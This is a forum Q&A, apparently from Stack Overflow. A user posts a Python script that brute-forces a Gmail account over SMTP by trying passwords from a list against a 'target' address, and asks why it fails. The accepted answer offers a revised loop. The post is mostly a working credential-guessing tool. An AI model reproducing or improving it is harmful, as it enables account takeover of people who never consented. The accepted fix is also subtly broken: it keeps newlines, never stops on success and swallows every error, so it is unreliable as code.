# Why Isn't my Python Gmail Bruteforce Not Logging into Accounts

Tags: python, brute-force

I have recently finished my gmail bruteforcer used to test security flaws.
I made a test account to see if the brute force works on it & I put in the right password in the pass file
and everytime it runs it says its incorrect when its not.

Is it because my checker is old or do I need to use a different API method please tell me.
Here's my code.

```
import smtplib
 
print("| Gmail Force |")
 
smtpserver = smtplib.SMTP("smtp.gmail.com", 587)
smtpserver.ehlo()
smtpserver.starttls()
 
user = input("Enter the targets email address: ")
passwfile = input("Enter the password file name: ")
passwfile = open(passwfile, "r")
 
for password in passwfile:
    password = password.rstrip('\n')
    try:
        smtpserver.login(user, password)
 
        print ("[+] Password Found: %s" % password)
        break;
    except smtplib.SMTPAuthenticationError:
        print ("[!] Password Incorrect: %s" % password)
```

Please feel free to test it yourself if you would like to it's in Python.

Thanks.

Answer (score 0, accepted):

instead of

```
passwfile = open(passwfile, "r")
 
for password in passwfile:
    password = password.rstrip('\n')
    try:
        smtpserver.login(user, password)
 
        print ("[+] Password Found: %s" % password)
        break;
    except smtplib.SMTPAuthenticationError:
        print ("[!] Password Incorrect: %s" % password)
```

try

```
passwfile = open(passwfile, "rb").readlines()
 
for password in passwfile:
    try:
        smtpserver.login(user, password)
 
        print ("[+] Password Found: {}".format(password))
        pass
    except:
        print ("[!] Password Incorrect: {}".format(password))
```